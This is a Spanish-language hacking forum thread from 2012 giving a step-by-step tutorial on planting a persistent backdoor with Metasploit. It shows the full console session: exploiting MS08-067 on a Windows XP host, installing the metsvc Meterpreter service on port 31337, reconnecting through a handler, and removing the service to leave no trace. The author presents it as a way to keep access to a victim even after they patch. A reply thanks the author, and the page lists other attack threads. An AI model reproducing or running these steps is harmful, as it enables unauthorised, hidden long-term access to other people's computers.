Como crear un BackDoor con Metasploit

  • 1 Respuestas
  • 3590 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Pekador

  • *
  • Underc0der
  • Mensajes: 30
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Como crear un BackDoor con Metasploit

  • en: Abril 23, 2012, 04:08:15 pm
Lo primero es que necesitamos una sesión de meterpreter en el sistema remoto.

Código: [Seleccionar]
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 489 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
=[ svn r8074 updated today (2010.01.05)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 172.16.83.128
RHOST => 172.16.83.128
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LHOST 172.16.83.1
LHOST => 172.16.83.1
msf exploit(ms08_067_netapi) > exploit
  • Started bind handler
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 3[/li][/list]
    - lang:English
  • Selected Target: Windows XP SP3 English (NX)
  • [/li][/list]
    Triggering the vulnerability...
  • Sending stage (723456 bytes)
  • [/li][/list]
    Meterpreter session 3 opened (172.16.83.1:54745 ->
    172.16.83.128:4444)

    meterpreter >

    Una vez conseguida, ejecutamos metsrv, que instalará como servicio un servidor de meterpreter en el host remoto.

    Código: [Seleccionar]
    meterpreter > run metsvc
  • Creating a meterpreter service on port[/li][/list]
    31337
  • Creating a temporary installation directory[/li][/list]
    C:\WINDOWS\TEMP\HdOFwlxzpobWuh...
  • >> Uploading metsrv.dll...
  • [/li][/list]
    >> Uploading metsvc-server.exe...
  • >> Uploading[/li][/list]
    metsvc.exe...
  • Starting the service...[/li][/list]
    * Installing service metsvc
    * Starting service
    Service metsvc successfully installed.

    Ahora, si queremos, podemos reiniciar el sistema remoto, aunque el servicio ya está corriendo.

    Código: [Seleccionar]
    meterpreter > reboot
    Rebooting...
    meterpreter >

    Ahora, cuando se reinicie el host remoto, vamos a conectarnos al servicio de meterpreter que acabamos de instalar.

    Para ello, usaremos el handler para que nos porte el exploit windows/metsvc_bind_tcp, lo configuraremos y nos conectaremos, como haré yo.

    Código: [Seleccionar]
    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
    PAYLOAD => windows/metsvc_bind_tcp
    msf exploit(handler) > show options

    Module options:

    Name Current Setting Required Description
    ---- --------------- -------- -----------


    Payload options (windows/metsvc_bind_tcp):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC process yes Exit technique: seh, thread, process
    LPORT 4444 yes The local port
    RHOST no The target address


    Exploit target:

    Id Name
    -- ----
    0 Wildcard Target


    msf exploit(handler) > set LPORT 31337
    LPORT => 31337
    msf exploit(handler) > set RHOST 172.16.83.128
    RHOST => 172.16.83.128
    msf exploit(handler) > exploit

  • Starting the payload handler...
  • Started bind handler
  • [/li][/list]
    Meterpreter session 1 opened (172.16.83.1:42050 ->
    172.16.83.128:31337)

    meterpreter >

    Y ya está! Esto nos viene bien por si el host remoto aplica un parche que corrija sus vulnerabilidades.
    Aunque parchee el sistema, nosotros tendremos acceso a su sistema a través de ese backdoor.

    Y si queremos desinstar el metsvc en el host remoto para no dejar rastro, tan sólo tenemos que ejecutar metsvc -r en nuestra sesión de meterpreter.

    Código: [Seleccionar]
    meterpreter > run metsvc -r
  • Removing the existing Meterpreter[/li][/list]
    service
  • Creating a temporary installation directory[/li][/list]
    C:\WINDOWS\TEMP\QQqawIYOjLq...
  • >> Uploading metsvc.exe...
  • [/li][/list]
    Stopping the service...
    * Stopping service metsvc
    * Removing service
    Service metsvc successfully removed.

    meterpreter >

    Y quedará metsvc completamente desinstalado sin perder la sesión que estamos utilizando (Por si cambiamos de idea xD)

    Y bueno ahora ya está todo ;) Muy sencillo, muy fácil y sobre todo, explicado de una manera sencilla para todos.

    Autor del post: Joker
« Última modificación: Abril 23, 2012, 04:26:02 pm por Pr0ph3t »
?

Desconectado andrewtwo

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Como crear un BackDoor con Metasploit

  • en: Agosto 30, 2012, 05:02:39 am
Genial no me sabia el  run metsvc
  • veo que es xp hay que ver si funciona con otras versiones igual, buen dato  ;)

 

Los 3 modos más comunes de hackear WordPress y cómo evitarlo

Iniciado por Hackmundy

Respuestas: 2
Vistas: 7524
Último mensaje Marzo 06, 2013, 01:15:42 am
por b166er
[VIDEO] Como subir una shell a Wordpress

Iniciado por unkdown

Respuestas: 2
Vistas: 3968
Último mensaje Diciembre 13, 2015, 07:12:12 pm
por Gabriela
Como Encontrar el AdminPanel (Algunos Metodos)

Iniciado por hdbreaker

Respuestas: 4
Vistas: 4994
Último mensaje Junio 25, 2012, 03:34:37 pm
por Satyricon
Como hacer una BackConect By Okol

Iniciado por Okol

Respuestas: 12
Vistas: 7547
Último mensaje Septiembre 17, 2012, 02:35:10 am
por Mr_Pack
¿Que es un Buffer Overflow?¿Como explotarlo?

Iniciado por HckDrk

Respuestas: 3
Vistas: 4624
Último mensaje Noviembre 24, 2012, 07:21:39 am
por Pr0ph3t